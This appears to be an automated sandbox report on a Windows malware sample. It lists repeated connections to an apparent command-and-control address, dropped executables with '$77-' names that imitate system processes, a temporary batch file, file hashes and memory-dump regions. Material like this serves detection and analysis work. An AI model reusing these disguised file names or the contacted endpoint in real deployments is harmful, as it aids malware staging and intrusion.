US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
GB 216.58.204.67:443 update.googleapis.com tcp
US 13.107.246.64:443 edge-mobile-static.azureedge.net tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 214.143.182.52.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp

Files

C:\Windows\Resources\$77-sdchost.exe

MD5 3f7291a1225138608a020a1e3ccc4740
SHA1 77bc47fd739a3efb3f22b590b6acb4e101d78c61
SHA256 b07657bb984766acf4f99a7645f6da9a251e2dc3afc839a6ae7f049605b87011
SHA512 03c622b528930e70d103a7ccfe8405cea333e5801a8bded99555bb58819b67ee5dcdb0861a3bc17afd5903b392f0a7a766047dbccd1674203c61238cd65f39e7

C:\Windows\Resources\$77-scchost.exe

MD5 9c17bdda52e21d8df835cee315b506dd
SHA1 f01ccf02c4b92dc8e261da1e48f54ccd548c8af0
SHA256 f8bcd12f0b30a378747069cc28aaae74d30aafc33656152ee34f818a10e8973f
SHA512 7acd79e169949ef7445230ea474a38786cda317469be340fa94b83dcf26b0025b0baff45ff37c88c632ceaef6565a503d7f19d3884c467f8d68c28f86c3f9889

memory/4020-11-0x00000000002D0000-0x000000000035E000-memory.dmp

memory/4268-12-0x0000000000CB0000-0x0000000000D36000-memory.dmp

C:\Windows\Resources\$77-penisware.exe

MD5 d2b0fd7476f280dc1d8d085d693b37f8
SHA1 6d8cd2158d77f33b7c320984cedbbf3ac7c8513c
SHA256 c05c71085a3ff83980a530aa77c500b98610f4e934315b6831448b96a45d9067
SHA512 d3fd2bfe426b9c9a1c83e3b03fd0f6c32e07c236116f4319305adbe8e323be506cc92a390e7d86e0355618df995474455c26f8de24831283902e90c38853bf41

memory/1212-16-0x00000000008B0000-0x0000000000926000-memory.dmp

C:\Windows\Resources\$77-penisware2.exe

MD5 18f497deffe88b6b2cff336a277aface
SHA1 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA256 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA512 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d

memory/2492-20-0x00000000008A0000-0x00000000008E6000-memory.dmp

memory/2492-21-0x0000000000F80000-0x0000000000F86000-memory.dmp

C:\Windows\Resources\$77-install.exe

MD5 1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256 b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

C:\Users\Admin\AppData\Local\Temp\tmp829.tmp.bat

MD5 f9968ce2fc9f76c50aab6dd2c3946135
SHA1 8ad6731b10344ce061c20da7cc804db708518955
SHA256 4c61e1af995654525db973afdecb946a581d207ab3362239ab1bf453ab1c2e49
SHA512 32edad9cbec8fb20898f7580e7dadb05ddc97853b38e076843cad89199e3b0fbd58f2787c8d6a1817938d61feb78012474314b3dfd05c4633b6448a1002277d0

memory/4856-33-0x0000023A3DC70000-0x0000023A3DC92000-memory.dmp

C:\Windows\Temp\__PSScriptPolicyTest_4f0veh3h.5ea.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4856-41-0x0000023A40200000-0x0000023A4022A000-memory.dmp

memory/4856-43-0x00007FFFC9050000-0x00007FFFC910E000-memory.dmp

memory/4856-42-0x00007FFFCAA90000-0x00007FFFCAC85000-memory.dmp

memory/220-47-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-46-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-45-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-44-0x0000000140000000-0x0000000140008000-memory.dmp

memory/220-51-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3548-57-0x000002563A4B0000-0x000002563A4DB000-memory.dmp

memory/3548-56-0x000002563A480000-0x000002563A4A5000-memory.dmp

memory/3548-58-0x000002563A4B0000-0x000002563A4DB000-memory.dmp

memory/3548-64-0x000002563A4B0000-0x000002563A4DB000-memory.dmp

memory/3548-65-0x00007FFF8AB10000-0x00007FFF8AB20000-memory.dmp

memory/4268-69-0x0000000001650000-0x000000000167B000-memory.dmp

memory/1212-78-0x0000000001170000-0x000000000119B000-memory.dmp

memory/2492-88-0x000000001B970000-0x000000001B99B000-memory.dmp

memory/1960-96-0x0000025A13FE0000-0x0000025A1400B000-memory.dmp

memory/1960-103-0x00007FFF8AB10000-0x00007FFF8AB20000-memory.dmp

memory/972-107-0x000001E1404C0000-0x000001E1404EB000-memory.dmp

memory/1960-102-0x0000025A13FE0000-0x0000025A1400B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log

MD5 183dd1cd0014293865e135951d0197ab
SHA1 268bba2c9c82727b1b32857e67ec26af46ad4cc6
SHA256 2f46685bdaf0f2e29ea07f3967a99785e9eab1add962f357acfc68b53545057e
SHA512 c6fb59e54c4934bd4018ac404a7cd4d5ab6f1687b8e73c9a54d16f0158381f0d8c41160cd8f7f11ecff0da84f3b278beb5a224c7423a8623be617cf7ec63b271

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 6c010b02317bdddd23944282642ec796
SHA1 05504f29b249e87c1ad8276e7e0bd9f9eaf48c04
SHA256 f53f48a6a05f697d5d8b64d78dbacfca1b379bff9938e8fe9015c6d5546d06b1
SHA512 4fc92332bd41ecde2e54fcb08992902f220c172f52aca2842ba03a8c857b770c4cad78a73f2fbc1013506c9c2d56fc459e7ea92ea1622b617947a5b29c32b53d

\??\pipe\crashpad_5424_ASYXDVEZSJUHSFQR

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ab342cec039c39b41deec188abd85e5b
SHA1 e7a817c0650cb7d0c9e654b35a381f552c1cff72
SHA256 638df312904e77ead9fc391231bbb43f3f594d29a8f80b39b1248f7ec0a0fba0
SHA512 1c4769993df16750978d85321dc7b2b3c916b736b6b32797d1b764a9072271a1311e5c0d815b14bbabb3bce36e30c5208836635f77add16a34358e0afd9c09eb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8b2c2e04a2298d528e8097a085cfdd05
SHA1 5f383d37f02ee89276724c13e8d50d12232bd40d
SHA256 c0b018c7ae80444cf0b3cce47182157f64794b874ad25539292ecce3c0415f4f
SHA512 b52892eb9502184b35006cc8529297e73c1fa099bbafaf1e326b58038702af7f8a6071062d16cf8b85241803a98f8d278a12ee62bae44f86910c33787b9bda13

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f8c0cc0a68ed22dee319ebbb70bce669
SHA1 91bc00d932b728935a8b1da95317be39eb2ff32a
SHA256 1d1b26a8b03ec00778f11cb135a38b1dc7858dee5b0c7c840398a6e10fae5243
SHA512 d5af75636561fc0574e820287e62b290fde34500056e63da48e54cb04e94b07e0761cfe8eee6b82f7e9285a1ab378314af7c613a72434351646b5a1cd8eb1884

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-penisware.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 d9c7d39c7bffea1b1e7f406744c72257
SHA1 6faea4bc43874655ea6b9eb0b2773c2c1684d7dd
SHA256 352c6424794af58a9c30403b3c725c280c2e03a87e58923e888a189aa4c568ce
SHA512 834ad46b08bcbfb0625a5c5b12c126e141946458b7280859c60e3c76c8aee7260b8137c30db6e9c7e78340e8c06d01788531acaf710368e59d06a48ef6f0750d